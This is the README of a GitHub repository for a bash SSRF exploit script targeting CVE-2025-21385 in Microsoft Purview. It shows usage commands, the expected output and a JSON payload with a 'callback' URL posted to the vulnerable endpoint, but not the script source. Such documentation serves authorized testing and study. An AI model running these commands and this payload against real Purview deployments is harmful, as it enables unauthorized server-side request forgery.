Pauloxc6/CVE-2025-21385

SSRF Exploit Script

This repository contains a script designed to perform an SSRF (Server-Side Request Forgery) exploit for testing and educational purposes. Use this tool responsibly and only in environments where you have explicit permission.

Features

  • Exploit SSRF vulnerabilities in target systems.
  • Validate input URLs to avoid misuse.
  • Easy-to-use CLI with clear error messages and a help menu.

Requirements

  • bash (Unix shell)
  • jq (JSON processor)
  • curl (Command-line tool for HTTP requests)

Usage

Syntax

./script.sh --exploit <target_url> <purview_url>

Options

Option               Description
-h, --help           Show the help menu.
--exploit <tu> <pu>  Perform the SSRF exploit with target and purview URLs.

Examples

Show Help Menu

./script.sh -h

Output:

Usage:
./script.sh --exploit <target_url> <purview_url>

Options:
-h, --help       - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs

Perform SSRF Exploit

./script.sh --exploit http://example.com http://purview-url.com

Expected Output:

  • If successful:
    SSRF exploit successful! Data retrieved:
    <response data>
    
  • If unsuccessful:
    SSRF exploit failed! HTTP code: <code>
    

Script Workflow

  1. The script parses the provided arguments.
  2. It validates the provided URLs for correctness.
  3. It sends an HTTP POST request with a JSON payload to the purview_url, attempting to exploit an SSRF vulnerability.
  4. It prints the HTTP response or an error message based on the result.

Example Workflow

Input

./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com

Payload Sent

{
  "callback": "http://callback-url.com"
}

Response Handling

The script saves the HTTP response code and body, then uses the status code to decide whether the exploit succeeded or failed.

Error Handling

  • If invalid or missing arguments are detected, the script provides detailed instructions via the help menu.
  • If URLs are malformed, an error message is displayed, and the execution stops.

Development Notes

This script is for testing purposes only. Misuse of this script can lead to severe legal consequences. Ensure compliance with all applicable laws and ethical standards.

Contribution

Feel free to contribute by creating pull requests or reporting issues.

License

GNU GPL v3


Disclaimer

This tool is intended for educational purposes and authorized penetration testing only. The author is not responsible for any misuse or damage caused by this tool.

About

The SSRF vulnerability in Microsoft Purview
